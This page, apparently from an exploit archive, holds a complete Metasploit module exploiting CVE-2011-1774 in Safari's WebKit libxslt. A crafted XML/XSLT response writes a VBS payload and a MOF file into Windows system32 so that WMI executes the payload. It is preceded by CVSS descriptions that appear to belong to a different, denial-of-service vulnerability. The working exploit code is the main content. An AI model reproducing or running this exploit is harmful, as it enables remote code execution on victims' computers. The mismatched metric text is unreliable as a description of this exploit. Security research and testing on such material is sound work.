The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
None
C
There is no impact on the confidentiality of the system; the attacker does not gain the ability to read any data.
Integrity
None
I
There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
##
# $Id: safari_xslt_output.rb 13987 2011-10-18 07:39:50Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple Safari Webkit libxslt Arbitrary File Creation',
'Description' => %q{
This module exploits a file creation vulnerability in the Webkit
rendering engine. It is possible to redirect the output of a XSLT
transformation to an arbitrary file. The content of the created file must be
ASCII or UTF-8. The destination path can be relative or absolute. This module
has been tested on Safari and Maxthon. Code execution can be acheived by first
uploading the payload to the remote machine in VBS format, and then upload a MOF
file, which enables Windows Management Instrumentation service to execute the VBS.
},
'License' => MSF_LICENSE,
'Author' => ['Nicolas Gregoire'],
'Version' => '$Revision: 13987 $',
'References' =>
[
['CVE', '2011-1774'],
['OSVDB', '74017'],
['URL', 'http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html'],
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 2048,
},
'Platform' => 'win',
'Targets' =>
[
#Windows before Vista
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 20 2011'))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Check target before attacking
agent = request.headers['User-Agent']
if agent !~ /Windows NT 5\.1/ or agent !~ /Safari/ or agent !~ /Version\/5\.0\.\d/
print_error("This target isn't supported: #{agent.to_s}")
send_not_found(cli)
return
end
url = "http://"
url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
url += ":" + datastore['SRVPORT'] + get_resource() + "/"
content = <<-EOS
<?xml-stylesheet type="text/xml" href="#fragment"?>
<!-- Define the DTD of the document
This is needed, in order to later reference the XSLT stylesheet by a #fragment
This trick allows to have both the XML and the XSL in the same file
Cf. http://scarybeastsecurity.blogspot.com/2011/01/harmless-svg-xslt-curiousity.html -->
<!DOCTYPE doc [
<!ATTLIST xsl:stylesheet
id ID #REQUIRED
>]>
<doc>
<!-- Define location and content of the files -->
<mof>
<location><![CDATA[\\\\.\\GLOBALROOT\\SystemRoot\\system32\\wbem\\mof\\#{@mof_name}]]></location>
<content><![CDATA[#{@mof_content}]]></content>
</mof><vbs>
<location><![CDATA[\\\\.\\GLOBALROOT\\SystemRoot\\system32\\#{@vbs_name}]]></location>
<content><![CDATA[#{@vbs_content}]]></content>
</vbs>
<!-- The XSLT stylesheet header, including the "sx" extension -->
<xsl:stylesheet id="fragment" version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:sx="http://icl.com/saxon"
extension-element-prefixes="sx"
xmlns="http://www.w3.org/1999/xhtml" >
<xsl:output method="xml" indent="yes" />
<!-- The XSLT template -->
<xsl:template match="/">
<!-- Define some XSLT variables -->
<xsl:variable name="moflocation" select="//mof/location/text()"/>
<xsl:variable name="vbslocation" select="//vbs/location/text()"/>
<!-- Create the files -->
<sx:output file="{$vbslocation}" method="text">
<xsl:value-of select="//vbs/content"/>
</sx:output>
<sx:output file="{$moflocation}" method="text">
<xsl:value-of select="//mof/content"/>
</sx:output>
<!-- Some output to the browser -->
<html> </html>
</xsl:template>
</xsl:stylesheet>
</doc>
EOS
#Clear the extra tabs
content = content.gsub(/^\t\t/, '')
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, content, {'Content-Type'=>'application/xml'})
handler(cli)
end
def exploit
# In order to save binary data to the file system the payload is written to a VBS
# file and execute it from there via a MOF
@mof_name = rand_text_alpha(rand(5)+5) + ".mof"
@vbs_name = rand_text_alpha(rand(5)+5) + ".vbs"
print_status("Encoding payload into vbs...")
payload = generate_payload_exe
@vbs_content = Msf::Util::EXE.to_exe_vbs(payload)
print_status("Generating mof file...")
@mof_content = generate_mof(@mof_name, @vbs_name)
super
end
end
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum